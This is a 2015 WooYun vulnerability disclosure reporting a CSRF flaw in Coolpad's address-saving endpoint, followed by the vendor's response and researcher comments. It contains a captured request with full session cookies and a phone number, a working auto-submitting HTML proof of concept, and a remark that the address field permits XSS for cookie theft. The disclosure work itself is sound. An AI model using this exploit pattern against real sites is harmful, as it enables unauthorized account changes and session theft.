当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105129

漏洞标题:酷派某分站CSRF越权修改资料

相关厂商:yulong.com

漏洞作者: 泳少

提交时间:2015-04-02 14:43

修复时间:2015-05-22 09:20

公开时间:2015-05-22 09:20

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-02: 细节已通知厂商并且等待厂商处理中
2015-04-07: 厂商已经确认,细节仅向厂商公开
2015-04-17: 细节向核心白帽子及相关领域专家公开
2015-04-27: 细节向普通白帽子公开
2015-05-07: 细节向实习白帽子公开
2015-05-22: 细节向公众公开

简要描述:

酷派某分站CSRF越权修改资料

详细说明:

问题地址 http://www.coolpad.com/myec/myAddress.htm#

POST /member/memberAddressAction!saveAddreass.do HTTP/1.1
Host: www.coolpad.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.coolpad.com/myec/myAddress.htm
Content-Length: 222
Cookie: pgv_pvi=839996416; pgv_si=s5988466688; CP_SW_U_Id=ed13a4ef-76e4-43ec-ad3d-71b870e61930_89wff3; W_CP_T_Id=dt9_894590b560-fe19-4581-ac7f-eb5019fa3613s1sr; Hm_lvt_ed4dc0af212843677141159d85428e45=1427696677; Hm_lpvt_ed4dc0af212843677141159d85428e45=1427698264; isMobile=n; _adwb=186884782; _adwc=186884782; _adwp=186884782.1073015111.1427696676.1427696676.1427696676.1; _adwr=186884782%23http%253A%252F%252Fhealth.coolyun.com%252F; __ozlvd1844=1427698263; U_T=null; rememberUserNickName=29311707; isHasLogin=true; shopCart=""; glanceOverGoods=""; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest4905ED02-9D49-04,tid:1427696679035713}; NTKF_T2D_CLIENTID=guest4905ED02-9D49-04E8-4B60-695A79CF5440; JSESSIONID=89E1BAF3241C39C3D077D8797006D3FB; _jzqa=1.4072024361483798000.1427696684.1427696684.1427696684.1; _jzqb=1.25.10.1427696684.1; _jzqc=1; _jzqx=1.1427696684.1427696684.1.jzqsr=coolpad%2Ecom|jzqct=/.-; _jzqckmp=1; _qzja=1.1064359118.1427696684524.1427696684524.1427696684525.1427698509524.1427698627783.0.0.0.25.1; _qzjb=1.1427696684524.25.0.0.0; _qzjc=1; _qzjto=25.1.0; Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1427696685; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1427698628
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
addressId=&receiver=test&province=260&city=252&district=3070&address=test&mobilePhone=13416364102&telPhone=&email=&postCode=&fullAddress=%E5%B9%BF%E4%B8%9C%E7%9C%81%E4%BD%9B%E5%B1%B1%E5%B8%82%E9%AB%98%E6%98%8E%E5%8C%BAtest


抓到的包可见木有token限制。直接构造POC吧

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>test</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "172" );
function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;
    do { curDate = new Date(); }
    while(curDate-date < millis);
}
function fireForms()
{
    var count = 1;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
        pausecomp(pauses[i]);
    }
}
    
</script>
<H2>test</H2>
<form method="POST" name="form0" action="http://www.coolpad.com:80/member/memberAddressAction!saveAddreass.do">
<input type="hidden" name="addressId" value=""/>
<input type="hidden" name="receiver" value="test"/>
<input type="hidden" name="province" value="856"/>
<input type="hidden" name="city" value="860"/>
<input type="hidden" name="district" value="862"/>
<input type="hidden" name="address" value="test"/>
<input type="hidden" name="mobilePhone" value="13416364102"/>
<input type="hidden" name="telPhone" value=""/>
<input type="hidden" name="email" value=""/>
<input type="hidden" name="postCode" value=""/>
<input type="hidden" name="fullAddress" value="重庆重庆市北碚区test"/>
</form>
</body>
</html>


另外说明个问题<input type="hidden" name="fullAddress" value="重庆重庆市北碚区test"/> 这个表单是可以控制的还可以输入XSS代码,弹窗盗cookie不成问题~

漏洞证明:

8682702_185111916000_2.jpg

修复方案:

加强token验证。

版权声明:转载请注明来源 泳少@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-04-07 09:19

厂商回复:

感谢你关注酷派安全,问题已转给业务方处理,十分感谢。

最新状态:

2015-04-08:已增加登录验证,另外,在没登录的情况下,此伪造的数据不可见或当前用户可见,XSS应该难以利用。@泳少,CSRF的有什么好方法,你说的token是指登录吗?

漏洞评价:

评论

  1. 2015-04-02 15:05 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    CSRF、越权,到底是啥,小厂商了

  2. 2015-04-02 15:21 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    来啦

  3. 2015-04-02 15:56 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    @px1624 擦。。又是小厂、算了。下次用小号发漏洞

  4. 2015-04-03 23:41 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    @浩天 麻烦把漏洞信息更细下可以吗?

  5. 2015-04-08 13:54 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    @yulong.com 恩。对的登陆了账号加上token限制、然后修改资料弄下验证码上去也可以的哈~

  6. 2015-05-08 09:32 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    这应该只是csrf吧